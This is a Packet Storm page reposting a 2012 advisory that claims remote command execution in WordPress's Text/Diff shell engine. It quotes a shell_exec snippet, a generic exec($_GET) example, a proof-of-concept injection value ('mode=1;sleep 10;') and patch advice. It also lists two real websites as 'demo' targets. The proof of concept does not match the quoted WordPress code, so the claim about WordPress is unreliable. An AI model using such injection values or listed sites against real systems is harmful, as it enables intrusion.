exploit the possibilities

WordPress Remote Command Execution

WordPress Remote Command Execution
Posted Oct 4, 2012
Authored by Nafsh

WordPress may suffer from a remote command execution vulnerability.

tags | exploit, remote
MD5 | 682c1d3f5373d2762aa45bd54be0f9ce

WordPress Remote Command Execution

Change Mirror Download
#########################################################
Author : Nafsh
Discovered By : Tapco Security & Research Lab
Date : 3 Oct 2012
Home : http://Sec-Lab.Tap-Co.Net
Contact : Nafsh.Hack@Gmail.com
#########################################################
Source : http://core.svn.wordpress.org/trunk/wp-includes/Text/Diff/Engine/shell.php

Source Of Bug :
$fp = fopen($to_file, 'w');
fwrite($fp, implode("\n", $to_lines));
fclose($fp);
$diff = shell_exec($this->_diffCommand . ' ' . $from_file . ' ' . $to_file);
unlink($from_file);
unlink($to_file);
#########################################################
vulnerability concept:

$_GET + shell_exec() = Command Execution

vulnerability description:

An attacker might execute arbitrary system commands with this vulnerability. User tainted data is used when creating the command that will be executed on the underlying operating system. This vulnerability can lead to full server compromise.

vulnerable example code :
1: exec("./crypto -mode " . $_GET["mode"]);

proof of concept :

/index.php?mode=1;sleep 10;

patch:

Limit the code to a very strict character subset or build a whitelist of allowed commands. Do not try to filter for evil commands. Try to avoid the usage of system command executing functions if possible.

1: $modes = array("r", "w", "a"); if(!in_array($_GET["mode"], $modes)) exit ;
r
#########################################################
D3m0 :

http://hackrva.org/wp-includes/Text/Diff/Engine/shell.php?Find It In Source=RCE

http://www.hawthorneyoga.com/wp-includes/Text/Diff/Engine/shell.php?Find It In Source=RCE
#########################################################
We are : K0242 | Nafsh | Ehram.shahmohamadi
#########################################################
Tnx : Am!r | M.R.S.CO All Members In Www.IrIsT.Ir & Www.IdC-TeAm.NeT
#########################################################
Greetz : All sec-lab researchers?
Login or Register to add favorites

File Archive:

December 2021

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    18 Files
  • 2
    Dec 2nd
    11 Files
  • 3
    Dec 3rd
    23 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close